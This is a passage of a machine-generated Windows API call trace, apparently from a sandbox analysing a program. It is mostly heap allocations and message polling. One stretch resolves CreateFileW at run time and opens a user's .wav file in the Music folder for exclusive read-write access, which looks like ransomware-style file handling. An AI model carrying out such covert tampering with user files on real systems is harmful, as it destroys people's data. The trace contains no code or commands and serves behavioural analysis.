wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0184.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0184.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0184.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0184.661] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0184.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0184.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd780 [0184.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0184.661] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0184.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0184.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0184.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0184.661] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0184.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0184.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0184.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0184.661] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0184.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0184.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0184.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0184.661] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.661] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0184.662] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0184.662] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.662] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.662] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0184.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0184.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0184.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0184.662] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0184.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0184.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0184.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0184.662] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0184.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0184.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0184.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0184.662] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2618 [0184.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0184.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0184.662] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0184.663] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8decb8 [0184.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd948 [0184.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2618 [0184.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0184.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0184.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0184.663] CharLowerBuffW (in: lpsz="handle", cchLength=0x6 | out: lpsz="handle") returned 0x6 [0184.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0184.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2848 [0184.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2778 [0184.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0184.663] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0184.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0184.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c2658 [0184.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0184.663] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd468 [0184.663] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileW", cchWideChar=12, lpMultiByteStr=0x9bd468, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileW", lpUsedDefaultChar=0x0) returned 12 [0184.664] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\LfTuLY5i.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz\\lftuly5i.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x138 [0184.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26d8 [0184.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0184.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8ded80 [0184.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd510 [0184.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0184.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0184.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0184.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0184.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27a8 | out: hHeap=0x8a0000) returned 1 [0184.664] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0184.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0184.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba2e8 [0184.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0184.664] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c27a8 [0184.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdab0 | out: hHeap=0x8a0000) returned 1 [0184.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb0) returned 0x8e6d90 [0184.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbd17d0 | out: hHeap=0x8a0000) returned 1 [0184.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdab0 [0184.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0184.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0184.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0184.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0184.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0184.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0184.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0184.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0184.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0184.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0184.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0184.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0184.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd570 | out: hHeap=0x8a0000) returned 1 [0184.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd570 [0184.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0184.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0184.665] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0184.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0184.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0184.665] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0184.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd978 [0184.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0184.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0184.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0184.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0184.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0184.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f58 | out: hHeap=0x8a0000) returned 1 [0184.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f58 [0184.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0184.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0184.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0184.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0184.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0184.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba018 | out: hHeap=0x8a0000) returned 1 [0184.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba018 [0184.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda08 [0184.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0d8 [0184.666] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c28d8 [0184.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0d8 | out: hHeap=0x8a0000) returned 1 [0184.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c28d8 | out: hHeap=0x8a0000) returned 1 [0184.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda08 | out: hHeap=0x8a0000) returned 1 [0184.666] FreeLibrary (hLibModule=0x75990000) returned 1 [0184.666] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2778 | out: hHeap=0x8a0000) returned 1 [0184.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27d8 | out: hHeap=0x8a0000) returned 1 [0184.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2668 | out: hHeap=0x8a0000) returned 1 [0184.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27c8 | out: hHeap=0x8a0000) returned 1 [0184.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2688 | out: hHeap=0x8a0000) returned 1 [0184.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0184.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0184.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df1e0 | out: hHeap=0x8a0000) returned 1 [0184.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd558 | out: hHeap=0x8a0000) returned 1 [0184.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0184.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0184.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5b8 | out: hHeap=0x8a0000) returned 1 [0184.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0184.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0184.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0184.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0184.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba288 | out: hHeap=0x8a0000) returned 1 [0184.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd780 | out: hHeap=0x8a0000) returned 1 [0184.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0184.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd768 | out: hHeap=0x8a0000) returned 1 [0184.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0184.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0184.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0184.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3f0 | out: hHeap=0x8a0000) returned 1 [0184.667] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0184.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda68 | out: hHeap=0x8a0000) returned 1 [0184.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0184.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0184.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba408 | out: hHeap=0x8a0000) returned 1 [0184.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd720 | out: hHeap=0x8a0000) returned 1 [0184.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0184.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0184.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd990 | out: hHeap=0x8a0000) returned 1 [0184.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0184.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0184.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0184.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd858 | out: hHeap=0x8a0000) returned 1 [0184.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0184.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0184.668] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0184.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20a) returned 0x8e8808 [0184.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x9c26b8 [0184.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8808 | out: hHeap=0x8a0000) returned 1 [0184.668] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0184.668] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2678 [0184.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0184.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0184.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0184.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c2788 [0184.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d4a0 [0184.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2788 | out: hHeap=0x8a0000) returned 1 [0184.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2678 | out: hHeap=0x8a0000) returned 1 [0184.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d4a0 | out: hHeap=0x8a0000) returned 1 [0184.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0184.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0184.669] PeekMessageW (in: lpMsg=0x87ee3c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87ee3c) returned 0 [0184.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c27e8 [0184.669] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x9c26b8 [0184.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c26b8 | out: hHeap=0x8a0000) returned 1 [0184.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c27e8 | out: hHeap=0x8a0000) returned 1 [0184.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8db138 | out: hHeap=0x8a0000) returned 1 [0184.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0184.669] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8def88 | out: hHeap=0x8a0000) returned 1 [0184.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0184.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8debc8 | out: hHeap=0x8a0000) returned 1 [0184.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdb10 | out: hHeap=0x8a0000) returned 1 [0184.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fe8 | out: hHeap=0x8a0000) returned 1 [0184.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1aa0 | out: hHeap=0x8a0000) returned 1 [0184.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8ded58 | out: hHeap=0x8a0000) returned 1 [0184.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b50 | out: hHeap=0x8a0000) returned 1 [0184.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dece0 | out: hHeap=0x8a0000) returned 1 [0184.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0184.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df028 | out: hHeap=0x8a0000) returned 1 [0184.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd750 | out: hHeap=0x8a0000) returned 1 [0184.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd540 | out: hHeap=0x8a0000) returned 1 [0184.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2698 | out: hHeap=0x8a0000) returned 1 [0184.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df078 | out: hHeap=0x8a0000) returned 1 [0184.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0184.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0184.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2738 | out: hHeap=0x8a0000) returned 1 [0184.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8df000 | out: hHeap=0x8a0000) returned 1 [0184.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0184.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd798 | out: hHeap=0x8a0000) returned 1 [0184.670] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c2628 | out: hHeap=0x8a0000) returned 1 [0184.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dedd0 | out: hHeap=0x8a0000) returned 1 [0184.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd930 | out: hHeap=0x8a0000) returned 1 [0184.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8deec0 | out: hHeap=0x8a0000) returned 1 [0184.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0184.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dee70 | out: hHeap=0x8a0000) returned 1 [0184.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0184.671] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: 